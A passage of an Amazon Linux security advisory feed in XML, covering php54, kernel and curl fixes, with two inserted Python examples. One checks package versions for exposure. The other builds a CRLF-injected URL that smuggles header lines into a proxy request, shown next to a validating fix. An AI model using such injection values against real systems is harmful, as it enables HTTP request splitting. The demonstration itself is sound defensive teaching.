arch="i686"><filename>Packages/php55-odbc-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-mbstring" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mbstring-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-snmp" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-snmp-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-tidy" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-tidy-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-recode" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-recode-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-common" version="5.5.21" release="1.96.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-common-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-opcache" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-opcache-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-mcrypt" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mcrypt-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-debuginfo" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-debuginfo-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-gmp" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gmp-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-fpm" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-fpm-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-pdo" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pdo-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-bcmath" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-bcmath-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-ldap" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-ldap-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-process" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-process-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-mssql" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-mssql-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-enchant" version="5.5.21" release="1.96.amzn1" epoch="0" 
arch="i686"><filename>Packages/php55-enchant-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-gd" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-gd-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-devel" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-devel-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-pgsql" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-pgsql-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-soap" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-soap-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-intl" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-intl-5.5.21-1.96.amzn1.i686.rpm</filename></package><package name="php55-cli" version="5.5.21" release="1.96.amzn1" epoch="0" arch="i686"><filename>Packages/php55-cli-5.5.21-1.96.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-475</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-475: medium priority package update for php54</title><issued date="2015-02-11 19:34:00" /><updated date="2015-02-11 19:46:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2015-0232:
The exif_process_unicode function in ext/exif/exif.c in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code or cause a denial of service (uninitialized pointer free and application crash) via crafted EXIF data in a JPEG image.
1185472:
CVE-2015-0232 php: Free called on uninitialized pointer in exif.c
CVE-2015-0231:
Use-after-free vulnerability in the process_nested_data function in ext/standard/var_unserializer.re in PHP before 5.4.37, 5.5.x before 5.5.21, and 5.6.x before 5.6.5 allows remote attackers to execute arbitrary code via a crafted unserialize call that leverages improper handling of duplicate numerical keys within the serialized properties of an object. NOTE: this vulnerability exists because of an incomplete fix for CVE-2014-8142.
1185397:
CVE-2015-0231 php: use after free vulnerability in unserialize() (incomplete fix of CVE-2014-8142)
CVE-2014-9427:
sapi/cgi/cgi_main.c in the CGI component in PHP through 5.4.36, 5.5.x through 5.5.20, and 5.6.x through 5.6.4, when mmap is used to read a .php file, does not properly consider the mapping's length during processing of an invalid file that begins with a # character and lacks a newline character, which causes an out-of-bounds read and might (1) allow remote attackers to obtain sensitive information from php-cgi process memory by leveraging the ability to upload a .php file or (2) trigger unexpected code execution if a valid PHP script is present in memory locations adjacent to the mapping.
1178736:
CVE-2014-9427 php: out of bounds read when parsing a crafted .php file
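Deciding whether a host is actually exposed to an entry such as ALAS-2015-475 means comparing each installed package's epoch, version and release with the package elements listed below it, using rpm's own ordering rules rather than a string or float comparison (5.4.37 must sort after 5.4.9, and an epoch bump outranks any version). The Python below is an added example, not part of this feed and not yum's or rpm's code: it implements rpmvercmp-style segment comparison, then checks a constructed installed-package list (the shape rpm -qa would print, not a real host) against three of the php54 x86_64 packages from this advisory.

```python
import re

# Added example, not part of the Amazon Linux updateinfo feed or of yum/rpm.
# Splits a version or release string into numeric and alphabetic segments
# and compares them the way rpmvercmp() does.
_SEG = re.compile(r"[0-9]+|[a-zA-Z]+|~")


def rpmvercmp(a, b):
    """Return 1 if a is newer than b, -1 if older, 0 if they sort equal."""
    if a == b:
        return 0
    sa, sb = _SEG.findall(a), _SEG.findall(b)
    for i in range(max(len(sa), len(sb))):
        x = sa[i] if len(sa) > i else None
        y = sb[i] if len(sb) > i else None
        # a tilde sorts before anything, including the end of the string
        if x == "~" or y == "~":
            if x == y:
                continue
            return -1 if x == "~" else 1
        # otherwise the string with more segments is the newer one
        if x is None:
            return -1
        if y is None:
            return 1
        if x.isdigit() and y.isdigit():
            if int(x) != int(y):
                return 1 if int(x) > int(y) else -1
        elif x.isdigit():
            return 1          # a numeric segment is newer than an alphabetic one
        elif y.isdigit():
            return -1
        elif x != y:
            return 1 if x > y else -1   # plain strcmp for alphabetic segments
    return 0


def _epoch(e):
    # rpm -q prints "(none)" for an unset epoch; updateinfo writes epoch="0"
    return 0 if e in (None, "", "(none)") else int(e)


def evr_compare(installed, fixed):
    """Compare (epoch, version, release) triples: epoch wins, then version, then release."""
    if _epoch(installed[0]) != _epoch(fixed[0]):
        return 1 if _epoch(installed[0]) > _epoch(fixed[0]) else -1
    c = rpmvercmp(installed[1], fixed[1])
    return c if c != 0 else rpmvercmp(installed[2], fixed[2])


# Three of the x86_64 package elements from ALAS-2015-475 (name, epoch, version, release, arch).
ALAS_2015_475 = {
    "id": "ALAS-2015-475",
    "packages": [
        ("php54", "0", "5.4.37", "1.65.amzn1", "x86_64"),
        ("php54-cli", "0", "5.4.37", "1.65.amzn1", "x86_64"),
        ("php54-common", "0", "5.4.37", "1.65.amzn1", "x86_64"),
    ],
}

# Constructed installed set (not a real host), in the shape of
#   rpm -qa --qf '%{NAME} %{EPOCH} %{VERSION} %{RELEASE} %{ARCH}\n'
INSTALLED = [
    ("php54", "(none)", "5.4.36", "1.64.amzn1", "x86_64"),          # older than the fix
    ("php54-cli", "(none)", "5.4.37", "1.65.amzn1", "x86_64"),      # already at the fixed EVR
    ("php54-common", "(none)", "5.4.37", "1.66.amzn1", "x86_64"),   # a later rebuild, also fine
    ("curl", "(none)", "7.38.0", "1.48.amzn1", "x86_64"),           # not in this advisory
]


def affected(installed, advisory):
    """Installed packages whose EVR sorts below the advisory's fixed EVR."""
    fixed = {(p[0], p[4]): p[1:4] for p in advisory["packages"]}
    hits = []
    for name, epoch, ver, rel, arch in installed:
        f = fixed.get((name, arch))
        if f is not None and evr_compare((epoch, ver, rel), f) == -1:
            hits.append((name, arch, ver + "-" + rel, f[1] + "-" + f[2]))
    return hits


if __name__ == "__main__":
    for name, arch, have, need in affected(INSTALLED, ALAS_2015_475):
        print(ALAS_2015_475["id"], name, arch, "installed", have, "fixed in", need)
```

The match key is name plus arch, since an advisory lists i686 and x86_64 builds separately and a multilib host can carry both. The epoch handling matters for entries such as the java-1.6.0-openjdk packages later in this feed, which carry epoch 1: without it, a package whose version string looks higher would be judged safe when it is not.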
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-9427" title="" id="CVE-2014-9427" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0231" title="" id="CVE-2015-0231" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2015-0232" title="" id="CVE-2015-0232" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="php54" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-tidy" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-tidy-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-intl" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-intl-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-pgsql" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pgsql-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-mcrypt" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mcrypt-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-soap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-soap-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-gd" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-gd-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-dba" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-dba-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-bcmath" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-bcmath-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package 
name="php54-ldap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-ldap-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-mbstring" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mbstring-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-devel" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-devel-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-snmp-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-mysqlnd" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysqlnd-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-debuginfo" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-debuginfo-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-enchant" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-enchant-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-imap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-imap-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-recode" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-recode-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-common" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-common-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-mssql" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mssql-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-odbc" version="5.4.37" release="1.65.amzn1" epoch="0" 
arch="x86_64"><filename>Packages/php54-odbc-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-mysql" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-mysql-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-pspell" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pspell-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-pdo" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-pdo-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-xmlrpc" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xmlrpc-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-cli" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-cli-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-xml" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-xml-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-embedded" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-embedded-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-process" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-process-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-fpm" version="5.4.37" release="1.65.amzn1" epoch="0" arch="x86_64"><filename>Packages/php54-fpm-5.4.37-1.65.amzn1.x86_64.rpm</filename></package><package name="php54-snmp" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-snmp-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-debuginfo" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-debuginfo-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-pdo" 
version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pdo-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-bcmath" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-bcmath-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-mbstring" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mbstring-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-ldap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-ldap-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-pspell" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pspell-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-dba" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-dba-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-intl" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-intl-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-fpm" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-fpm-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-process" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-process-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-common" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-common-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-mssql" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mssql-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-pgsql" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-pgsql-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-tidy" 
version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-tidy-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-recode" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-recode-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-odbc" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-odbc-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-imap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-imap-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-xml" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xml-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-embedded" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-embedded-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-enchant" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-enchant-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-gd" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-gd-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-xmlrpc" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-xmlrpc-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-cli" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-cli-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-mysqlnd" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysqlnd-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-devel" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-devel-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-mysql" 
version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mysql-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-soap" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-soap-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-5.4.37-1.65.amzn1.i686.rpm</filename></package><package name="php54-mcrypt" version="5.4.37" release="1.65.amzn1" epoch="0" arch="i686"><filename>Packages/php54-mcrypt-5.4.37-1.65.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-476</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-476: medium priority package update for kernel</title><issued date="2015-02-11 19:34:00" /><updated date="2015-02-11 19:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8989:
The Linux kernel through 3.17.4 does not properly restrict dropping of supplemental group memberships in certain namespace scenarios, which allows local users to bypass intended file permissions by leveraging a POSIX ACL containing an entry for the group category that is more restrictive than the entry for the other category, aka a "negative groups" issue, related to kernel/groups.c, kernel/uid16.c, and kernel/user_namespace.c.
1170684:
CVE-2014-8989 kernel: Linux user namespaces can bypass group-based restrictions
CVE-2014-7822:
A flaw was found in the way the Linux kernel's splice() system call validated its parameters. On certain file systems, a local, unprivileged user could use this flaw to write past the maximum file size, and thus crash the system.
1163792:
CVE-2014-7822 kernel: splice: lack of generic write checks
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-7822" title="" id="CVE-2014-7822" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8989" title="" id="CVE-2014-8989" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="kernel-devel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-devel-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-devel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-devel-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="perf" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel-headers" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-headers-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/perf-debuginfo-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-tools-debuginfo-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="kernel-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package 
name="kernel-debuginfo-common-x86_64" version="3.14.33" release="26.47.amzn1" epoch="0" arch="x86_64"><filename>Packages/kernel-debuginfo-common-x86_64-3.14.33-26.47.amzn1.x86_64.rpm</filename></package><package name="perf-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/perf-debuginfo-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="perf" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/perf-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-tools-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-debuginfo-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-tools-devel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-devel-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-debuginfo-common-i686" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-debuginfo-common-i686-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-devel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-devel-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-headers" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-headers-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-3.14.33-26.47.amzn1.i686.rpm</filename></package><package name="kernel-tools" version="3.14.33" release="26.47.amzn1" epoch="0" arch="i686"><filename>Packages/kernel-tools-3.14.33-26.47.amzn1.i686.rpm</filename></package><package 
name="kernel-doc" version="3.14.33" release="26.47.amzn1" epoch="0" arch="noarch"><filename>Packages/kernel-doc-3.14.33-26.47.amzn1.noarch.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-477</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-477: medium priority package update for curl</title><issued date="2015-02-11 19:36:00" /><updated date="2015-02-11 19:48:00" /><severity>medium</severity><description>Package updates are available for Amazon Linux AMI that fix the following vulnerabilities:
CVE-2014-8150:
CRLF injection vulnerability in libcurl 6.0 through 7.x before 7.40.0, when using an HTTP proxy, allows remote attackers to inject arbitrary HTTP headers and conduct HTTP response splitting attacks via CRLF sequences in a URL.
1178692:
CVE-2014-8150 curl: URL request injection vulnerability in parseurlandfillconn()
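The injection CVE-2014-8150 describes is easiest to see by reconstructing the absolute-URI request line a client sends to an HTTP proxy: a URL containing a bare CR LF ends that line early, and everything after it is parsed by the proxy as further header lines. The Python below is an added example, not libcurl's code: it builds the proxy request naively, parses it the way a proxy would, and then shows the input check a client should apply before the URL reaches the request line. The URL, host name and header names are constructed for the demonstration.

```python
# Added example, not libcurl's code: a naive proxy request builder beside a
# hardened one, with a parser that shows what the proxy actually receives.

CRLF = "\r\n"


def build_proxy_request(url, host):
    """Naive builder: the URL is copied verbatim into the absolute-URI
    request line, which is the behaviour CVE-2014-8150 describes."""
    return "GET " + url + " HTTP/1.1" + CRLF + "Host: " + host + CRLF + CRLF


def parse_request(raw):
    """Split a request the way a proxy does: request line, then one header per line."""
    head = raw.split(CRLF + CRLF, 1)[0]
    lines = head.split(CRLF)
    headers = {}
    for line in lines[1:]:
        name, _, value = line.partition(":")
        headers[name.strip().lower()] = value.strip()
    return lines[0], headers


class UnsafeUrl(ValueError):
    """Raised for a URL that could break out of the request line."""


def check_url(url):
    """Reject CR, LF, NUL and every other control character: none of them is
    valid in a request-target, and they are exactly what the injection needs."""
    for ch in url:
        if 0x20 > ord(ch) or ord(ch) == 0x7F:
            raise UnsafeUrl("control character U+%04X in URL" % ord(ch))
    return url


def build_proxy_request_safe(url, host):
    """Hardened builder: validate the URL before it reaches the request line."""
    return build_proxy_request(check_url(url), host)


# Constructed attacker-controlled URL (demonstration only): the bare CR LF
# pairs end the request line and smuggle two header lines after it.
INJECTED_URL = ("http://example.test/ HTTP/1.1" + CRLF +
                "X-Injected: yes" + CRLF +
                "X-Pad:")


def demo():
    """Return the headers the proxy would see from the naive builder, and
    whether the hardened builder refused the same URL."""
    _, headers = parse_request(build_proxy_request(INJECTED_URL, "example.test"))
    try:
        build_proxy_request_safe(INJECTED_URL, "example.test")
        refused = False
    except UnsafeUrl:
        refused = True
    return headers, refused


if __name__ == "__main__":
    headers, refused = demo()
    print("proxy sees:", headers)
    print("hardened builder refused the URL:", refused)
```

The check has to run on the bytes that will actually be placed on the wire, after any decoding the client performs: a percent-encoded %0D%0A that stays encoded is just six ordinary characters in the request-target, while the same sequence decoded before the request is assembled is the raw line break the check is there to catch.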
CVE-2014-3707:
The curl_easy_duphandle function in libcurl 7.17.1 through 7.38.0, when running with the CURLOPT_COPYPOSTFIELDS option, does not properly copy HTTP POST data for an easy handle, which triggers an out-of-bounds read that allows remote web servers to read sensitive memory information.
1154941:
CVE-2014-3707 curl: incorrect handle duplication after COPYPOSTFIELDS
</description><references><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-3707" title="" id="CVE-2014-3707" type="cve" /><reference href="http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2014-8150" title="" id="CVE-2014-8150" type="cve" /></references><pkglist><collection short="amazon-linux-ami"><name>Amazon Linux AMI</name><package name="curl" version="7.40.0" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-7.40.0-1.49.amzn1.x86_64.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/curl-debuginfo-7.40.0-1.49.amzn1.x86_64.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-devel-7.40.0-1.49.amzn1.x86_64.rpm</filename></package><package name="libcurl" version="7.40.0" release="1.49.amzn1" epoch="0" arch="x86_64"><filename>Packages/libcurl-7.40.0-1.49.amzn1.x86_64.rpm</filename></package><package name="curl" version="7.40.0" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/curl-7.40.0-1.49.amzn1.i686.rpm</filename></package><package name="libcurl-devel" version="7.40.0" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-devel-7.40.0-1.49.amzn1.i686.rpm</filename></package><package name="curl-debuginfo" version="7.40.0" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/curl-debuginfo-7.40.0-1.49.amzn1.i686.rpm</filename></package><package name="libcurl" version="7.40.0" release="1.49.amzn1" epoch="0" arch="i686"><filename>Packages/libcurl-7.40.0-1.49.amzn1.i686.rpm</filename></package></collection></pkglist></update><update status="final" version="1.4" author="linux-security@amazon.com" type="security" from="linux-security@amazon.com"><id>ALAS-2015-478</id><title>Amazon Linux AMI 2014.03 - ALAS-2015-478: medium priority package update for e2fsprogs</title><issued date="2015-02-11 19:36:00" /><updated 
